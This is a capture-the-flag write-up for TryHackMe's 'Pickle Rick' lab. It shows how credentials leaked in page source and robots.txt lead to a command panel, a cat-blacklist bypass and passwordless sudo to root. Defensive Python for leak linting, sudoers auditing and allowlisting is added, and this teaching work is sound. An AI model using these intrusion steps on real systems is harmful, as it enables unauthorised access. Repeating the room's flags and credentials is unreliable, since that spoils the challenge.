CTF Writeup

Pickle Rick

TryHackMe · Web Exploitation · Easy · by 0xb0rn3

Platform: TryHackMe
Category: Web Exploitation / Command Injection
Difficulty: Easy
Target: 10.49.178.139
Stack: Apache 2.4.41 / Ubuntu 20.04 / PHP
Flags: 3 ingredients found
0 · Context

Overview

Rick has turned himself into a pickle and needs three secret ingredients scattered across the filesystem to brew his reverse-potion. The attack surface is a web server with credentials leaked in HTML comments and robots.txt, leading to a command execution panel with a blacklisted cat that's trivially bypassed. The web user has unrestricted passwordless sudo — full root from the first shell.

ATTACK CHAIN
nmap scan
  └─► Port 80 open (Apache)
        └─► HTML source comment → Username: R1ckRul3s
        └─► /robots.txt         → Password: Wubbalubbadubdub
              └─► /login.php     → portal.php (RCE panel)
                    └─► ls /var/www/html     → Ingredient 1
                    └─► ls /home/rick        → Ingredient 2
                    └─► sudo -l (NOPASSWD: ALL)
                          └─► sudo ls /root  → Ingredient 3
1 · Reconnaissance

Port Scan

BASH
$ nmap -sV -sC -p- --min-rate 5000 10.49.178.139
Port     Service   Version
22/tcp   SSH       OpenSSH 8.2p1 Ubuntu
80/tcp   HTTP      Apache httpd 2.4.41

Minimal attack surface — just SSH and a web server. All the action is on port 80.

2 · Enumeration

Credential Harvesting

The main page source contains a developer note left in an HTML comment — the kind of mistake that happens more often in production than anyone wants to admit:

HTML
<!--
    Note to self, remember username!
    Username: R1ckRul3s
-->

And robots.txt — instead of disallowing paths, it contains a single string that turns out to be the password:

BASH
$ curl http://10.49.178.139/robots.txt
Wubbalubbadubdub

Credentials obtained: R1ckRul3s / Wubbalubbadubdub. Login at /login.php redirects to /portal.php — a command execution panel.
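Both leaks above are catchable before deployment with a simple lint over the web root. The following is an added example written for this writeup (Python, not part of the room or the author's tooling): it flags HTML comments that contain credential-style keywords and robots.txt lines that are not recognised directives, which is exactly what a bare password sitting in that file looks like. The sample index.html and robots.txt contents are constructed here from the values the room exposes, with a harmless comment and a clean robots.txt added for contrast.

```python
"""Static check for credential leaks in client-facing files.

Added example for this writeup, not the room's code or the author's script.
It scans HTML for comments that mention credentials and robots.txt for lines
that are not robots directives (a bare password would be one).
"""
import re

# Directives a robots.txt file legitimately contains (RFC 9309 plus the
# widely used Sitemap and Crawl-delay extensions).
ROBOTS_DIRECTIVES = {"user-agent", "allow", "disallow", "sitemap", "crawl-delay"}

# Keywords that, inside a comment, suggest a credential followed by a value.
SECRET_KEYWORDS = re.compile(
    r"\b(user(name)?|pass(word|wd)?|token|api[_-]?key|secret)\s*[:=]", re.I
)
HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.S)


def find_comment_secrets(html: str) -> list[str]:
    """Return HTML comments that look like they contain a credential."""
    hits = []
    for match in HTML_COMMENT.finditer(html):
        body = match.group(1)
        if SECRET_KEYWORDS.search(body):
            hits.append(" ".join(body.split()))  # collapse whitespace for reporting
    return hits


def find_robots_anomalies(robots: str) -> list[str]:
    """Return robots.txt lines that are neither blank, comments nor known directives."""
    anomalies = []
    for line in robots.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        field, sep, _value = stripped.partition(":")
        if not sep or field.strip().lower() not in ROBOTS_DIRECTIVES:
            anomalies.append(stripped)
    return anomalies


# Constructed samples: the comment and robots.txt content the room serves,
# plus a harmless developer comment and a clean robots.txt for contrast.
SAMPLE_INDEX_HTML = """<html><body>
<!-- TODO: tidy up the header layout -->
<!--
    Note to self, remember username!
    Username: R1ckRul3s
-->
</body></html>"""
SAMPLE_ROBOTS = "Wubbalubbadubdub\n"
CLEAN_ROBOTS = "User-agent: *\nDisallow: /admin/\nSitemap: https://example.invalid/sitemap.xml\n"

if __name__ == "__main__":
    for hit in find_comment_secrets(SAMPLE_INDEX_HTML):
        print("[!] credential-like HTML comment:", hit)
    for line in find_robots_anomalies(SAMPLE_ROBOTS):
        print("[!] non-directive line in robots.txt:", line)
    print("clean robots.txt anomalies:", find_robots_anomalies(CLEAN_ROBOTS))
```

Run against the real files with something like `find_comment_secrets(open("index.html").read())` in a CI step; the keyword list is deliberately short and should be extended with whatever naming your codebase uses for secrets.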

3 · Exploitation

Command Injection — RCE Confirmed

The portal accepts and executes OS commands server-side. The cat command is blacklisted, but less, head, tail, and strings all work — a classic incomplete filter bypass.

RCE
Command: whoami
www-data

Command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

4 · Flag Hunt

Ingredient 1 — Web Root

RCE
Command: ls /var/www/html
Sup3rS3cretPickl3Ingred.txt
assets  clue.txt  denied.php  index.html  login.php  portal.php

Command: less Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair

Ingredient 1: mr. meeseek hair

clue.txt hints to look around the filesystem for the remaining ingredients.

5 · Flag Hunt

Ingredient 2 — Rick's Home Directory

RCE
Command: ls /home/rick
second ingredients

Command: less "/home/rick/second ingredients"
1 jerry tear

Ingredient 2: 1 jerry tear

6 · Privilege Escalation

Sudo NOPASSWD → Ingredient 3

Checking sudo privileges reveals the worst possible configuration — www-data can run anything as root without a password:

RCE
Command: sudo -l
User www-data may run the following commands:
    (ALL) NOPASSWD: ALL

Command: sudo ls /root
3rd.txt  snap

Command: sudo less /root/3rd.txt
fleeb juice

Ingredient 3: fleeb juice

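The `(ALL) NOPASSWD: ALL` rule for www-data is the kind of entry a sudoers audit should refuse outright. The block below is an added example for this writeup (Python, not the room's code): it parses the common `user host=(runas) TAG: commands` rule shape, skips Defaults and alias lines, and rates any rule that gives a service account passwordless unrestricted sudo as critical. The sample sudoers content is constructed and includes the rule that `sudo -l` revealed above alongside a sane baseline.

```python
"""Audit a sudoers file for the misconfiguration found in this room: a web
service account allowed to run ALL commands as root without a password.

Added example for this writeup, not the room's code. Parsing covers the common
`user host=(runas) TAG: commands` shape; aliases and Defaults lines are skipped.
"""
import re
from dataclasses import dataclass

# Accounts that run network-facing daemons and should not appear in sudoers at all.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody", "mysql", "postgres"}

RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
TAG_RE = re.compile(
    r"^(?P<tag>NOPASSWD|PASSWD|SETENV|NOSETENV|EXEC|NOEXEC|LOG_INPUT|LOG_OUTPUT)\s*:\s*",
    re.I,
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


@dataclass
class Finding:
    who: str
    severity: str
    reason: str


def split_tags(rest: str) -> tuple[set[str], str]:
    """Peel leading tags (e.g. NOPASSWD:) off the command list."""
    tags: set[str] = set()
    while (m := TAG_RE.match(rest)):
        tags.add(m.group("tag").upper())
        rest = rest[m.end():]
    return tags, rest.strip()


def audit_sudoers(text: str) -> list[Finding]:
    """Return one Finding per rule that violates least privilege."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        who = m.group("who")
        tags, commands = split_tags(m.group("rest"))
        unrestricted = commands == "ALL"
        passwordless = "NOPASSWD" in tags
        if who in SERVICE_ACCOUNTS and passwordless and unrestricted:
            findings.append(Finding(who, "critical",
                                    "service account has passwordless root (NOPASSWD: ALL)"))
        elif who in SERVICE_ACCOUNTS:
            findings.append(Finding(who, "high", "service account present in sudoers"))
        elif passwordless and unrestricted and who != "root":
            findings.append(Finding(who, "medium", "passwordless unrestricted sudo"))
    return findings


# Constructed sample sudoers: a sane baseline plus the rule the room's sudo -l revealed.
SAMPLE_SUDOERS = """\
# constructed sample, not a real host's file
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
deploy          ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service
www-data        ALL=(ALL) NOPASSWD: ALL
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f.severity.upper()}] {f.who}: {f.reason}")
```

The `deploy` rule in the sample is passwordless but scoped to one command, so it produces no finding; that is the shape a web-adjacent sudo rule should take if one is needed at all.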
Visualization

Attack Chain

1. HTML Source — Username Leak
   Developer comment in page source: R1ckRul3s
2. robots.txt — Password Leak
   Password stored in plaintext: Wubbalubbadubdub
3. Portal Login → Command Injection
   Authenticated RCE via /portal.php command panel — cat blocked, less works
4. Filesystem Enumeration
   Ingredient 1 in web root, Ingredient 2 in /home/rick
5. sudo NOPASSWD: ALL → Root
   sudo less /root/3rd.txt → Ingredient 3: fleeb juice

Assessment

Vulnerabilities

Finding                       Location         Severity   Impact
OS command injection          /portal.php      Critical   Arbitrary command execution as www-data
NOPASSWD sudo ALL             sudoers config   Critical   Instant root from any www-data shell
Credentials in HTML comment   index.html       High       Username disclosure to any visitor
Password in robots.txt        /robots.txt      High       Credential exposure — indexed by search engines
Incomplete command filter     /portal.php      Medium     cat blocked, but less/head/tail bypass trivially

Defense

Takeaways

No Credentials in Source
HTML comments and robots.txt are publicly accessible. Never store credentials in client-facing files.
Never Expose OS Command Execution
Web panels that execute shell commands are critical vulnerabilities. Blacklisting specific commands is always bypassable.
Principle of Least Privilege
www-data with NOPASSWD: ALL means any web vulnerability is instantly root. Web users should have minimal system access.
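The portal's filter (section 3) and the second takeaway above are two sides of the same point, so one added example covers both. It is written for this writeup in Python and models the panel's behaviour rather than reproducing it (the real panel is PHP and its source is not on the page): `blacklist_permits` refuses only `cat`, which is why `less` on the same file sails through, while the hardened shape maps a fixed set of operation names to argv lists and executes them without a shell, so there is no command string for a user to influence. The operation names and their argv values are assumptions chosen for illustration.

```python
"""Why a command blacklist fails and what to do instead.

Added example for this writeup, modelling the portal's filter in Python.
blacklist_permits() mirrors the observed behaviour (only `cat` is refused);
ALLOWED_OPERATIONS / run_operation() show the allowlist alternative.
"""
import shlex
import subprocess
from typing import Optional

BLACKLIST = {"cat"}


def blacklist_permits(cmdline: str) -> bool:
    """Model of the portal's filter: reject only when the first word is blacklisted."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes
        return False
    return bool(argv) and argv[0] not in BLACKLIST


# Hardened alternative: the operator picks an operation name, never a command
# string. Each name maps to a fixed argv, so there is nothing to inject into.
# The operations below are illustrative assumptions, not the room's panel.
ALLOWED_OPERATIONS: dict[str, list[str]] = {
    "disk-usage": ["df", "-h"],
    "uptime": ["uptime"],
    "list-web-root": ["ls", "-l", "/var/www/html"],
}


def allowlisted_argv(operation: str) -> Optional[list[str]]:
    """Return the fixed argv for a permitted operation, or None if it is not allowed."""
    return ALLOWED_OPERATIONS.get(operation)


def run_operation(operation: str) -> str:
    """Execute an allowlisted operation without a shell and return its stdout."""
    argv = allowlisted_argv(operation)
    if argv is None:
        raise PermissionError(f"operation not permitted: {operation!r}")
    # shell=False: argv goes to execve directly, so shell metacharacters are inert.
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    # The first two attempts are the bypass the writeup observed: same file,
    # different reader, and the blacklist never notices.
    for attempt in ("cat clue.txt", "less clue.txt"):
        verdict = "allowed" if blacklist_permits(attempt) else "blocked"
        print(f"blacklist: {attempt!r} -> {verdict}")
    for op in ("uptime", "less clue.txt"):
        verdict = "permitted" if allowlisted_argv(op) else "refused"
        print(f"allowlist: {op!r} -> {verdict}")
```

The allowlist version also fixes the privilege problem by construction: the web process needs no sudo rule, because every permitted argv runs as the service account and does only what the panel was built to do.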
Automation

Full-Chain Exploit Script

The entire exploitation chain is automated in pickle_rick_pwn.sh — from credential harvesting through authentication to RCE and all three ingredient extractions.

BASH
$ chmod +x pickle_rick_pwn.sh
$ ./pickle_rick_pwn.sh 10.49.178.139

[+] Username found in HTML source: R1ckRul3s
[+] Password found in robots.txt:  Wubbalubbadubdub
[+] Login successful — Command Panel accessible
[FLAG] Ingredient 1 → mr. meeseek hair
[FLAG] Ingredient 2 → 1 jerry tear
[FLAG] Ingredient 3 → fleeb juice
[+] Rick's potion is complete. He's human again. *burp*


Arsenal

Tools Used

Tool                  Purpose
nmap                  Port scanning and service enumeration
curl                  HTTP requests, credential harvesting, login, RCE
less                  File reading (bypass for blacklisted cat)
pickle_rick_pwn.sh    Full-chain automated exploit (Bash)